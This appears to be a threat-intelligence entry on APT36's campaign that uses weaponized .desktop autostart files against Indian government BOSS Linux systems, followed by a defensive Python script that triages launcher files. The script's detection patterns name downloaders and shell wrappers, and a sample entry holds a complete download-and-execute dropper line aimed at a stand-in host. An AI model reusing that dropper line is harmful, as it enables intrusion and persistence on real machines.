APT36 Targets Indian BOSS Linux Systems with Weaponized AutoStart Files

Aug. 25, 2025, 11:03 a.m.

Description

APT36 (also tracked as Transparent Tribe), a Pakistan-based threat actor, is running a cyber-espionage campaign against Indian government entities that targets BOSS Linux (Bharat Operating System Solutions, the Debian-derived distribution promoted for use on Indian government systems). The lure is a spear-phishing email carrying a weaponized .desktop file: a freedesktop launcher entry whose Exec= line runs the attacker's command when the recipient opens it and which, once dropped into an autostart location, runs again at every login, giving the group persistence without touching a system service. Because a launcher is a plain-text file executed by the desktop session rather than a native binary, it draws less scrutiny from controls that key on executables and document macros. The campaign uses custom malware, command-and-control servers and data-exfiltration tooling, hosts its infrastructure on newly registered domains, and maps to a range of MITRE ATT&CK techniques. The activity shows APT36's increasing sophistication and adaptability in targeting critical government infrastructure.
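As an added example (not code from the report, and not APT36 tooling), the following Python script parses .desktop files the way a hunt on a BOSS or any Debian-family desktop would, and flags entries whose Exec= line has the shape of a dropper: a shell wrapper, a downloader, base64 decoding, staging under /tmp, or a decoy document opened alongside the payload. The heuristics, the two sample entries and the host 203.0.113.10 (an RFC 5737 documentation address) are constructed for this example and are assumptions, not indicators taken from the page.

```python
"""Triage freedesktop .desktop files for signs of weaponization.

Added example for this page; not code from the report or from APT36 tooling.
The heuristics below are this example's own assumptions about what a
weaponized launcher tends to contain, not indicators from the campaign.
"""
import re
from pathlib import Path

# (tag, regex) pairs applied to the Exec= line. Assumed heuristics.
SUSPICIOUS_EXEC = [
    ("shell -c wrapper", r"\b(?:bash|sh|zsh|dash)\s+-c\b"),
    ("network downloader", r"\b(?:curl|wget)\b"),
    ("base64 decode", r"\bbase64\b"),
    ("inline python", r"\bpython3?\s+-c\b"),
    ("writable-tmp path", r"/(?:tmp|dev/shm|var/tmp)/"),
    ("decoy document via xdg-open", r"\bxdg-open\b.*\.(?:pdf|docx?)\b"),
]
# A launcher whose Name= pretends to be a document is a common lure shape (assumption).
DOCUMENT_NAME = re.compile(r"\.(?:pdf|docx?|xlsx?|pptx?)$", re.IGNORECASE)


def parse_desktop(text):
    """Return the key/value pairs of the [Desktop Entry] group.

    Minimal INI-style parser: skips comments and every group other than
    [Desktop Entry]; localized keys such as Name[en_IN] stay separate keys.
    """
    entry = {}
    in_main_group = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_main_group = line == "[Desktop Entry]"
            continue
        if in_main_group and "=" in line:
            key, _, value = line.partition("=")
            entry[key.strip()] = value.strip()
    return entry


def triage(entry):
    """Return the list of reasons an entry looks weaponized; empty means clean."""
    reasons = []
    exec_line = entry.get("Exec", "")
    for tag, pattern in SUSPICIOUS_EXEC:
        if re.search(pattern, exec_line):
            reasons.append(tag)
    if DOCUMENT_NAME.search(entry.get("Name", "")):
        reasons.append("document-like Name")
    return reasons


def scan_autostart(dirs=None):
    """Triage every *.desktop file in the usual autostart locations.

    Returns {path: reasons} for entries with at least one finding.
    """
    if dirs is None:
        dirs = [Path.home() / ".config" / "autostart", Path("/etc/xdg/autostart")]
    findings = {}
    for d in dirs:
        if not Path(d).is_dir():
            continue
        for f in Path(d).glob("*.desktop"):
            reasons = triage(parse_desktop(f.read_text(errors="replace")))
            if reasons:
                findings[str(f)] = reasons
    return findings


# Constructed samples for the demo; 203.0.113.10 is an RFC 5737
# documentation address, not campaign infrastructure.
BENIGN_ENTRY = """[Desktop Entry]
Type=Application
Name=Network Manager Applet
Exec=nm-applet
Terminal=false
NoDisplay=true
"""

WEAPONIZED_ENTRY = """[Desktop Entry]
Type=Application
Name=Meeting_Notice.pdf
Icon=application-pdf
Exec=bash -c "mkdir -p /tmp/.cache && curl -s http://203.0.113.10/u | base64 -d > /tmp/.cache/svc && chmod +x /tmp/.cache/svc && /tmp/.cache/svc & xdg-open /tmp/.cache/notice.pdf"
Terminal=false
X-GNOME-Autostart-enabled=true
"""

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_ENTRY), ("weaponized", WEAPONIZED_ENTRY)):
        print(label, triage(parse_desktop(sample)) or "clean")
    for path, reasons in scan_autostart().items():
        print(path, reasons)
```

Run as root and point `scan_autostart()` at the `.config/autostart` directory of every account under /home as well as the two defaults, since a phished user's own autostart directory is where a launcher delivered by email would land. The tags are triage hints, not verdicts: a flagged entry still needs its Exec= target, the file's mtime and the sender of the originating mail examined before it is treated as an APT36 artefact.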

Date

  • Created: Aug. 23, 2025, 10:33 a.m.
  • Published: Aug. 23, 2025, 10:33 a.m.
  • Modified: Aug. 25, 2025, 11:03 a.m.

Attack Patterns

Additional Information

  • Government
  • British Indian Ocean Territory
  • India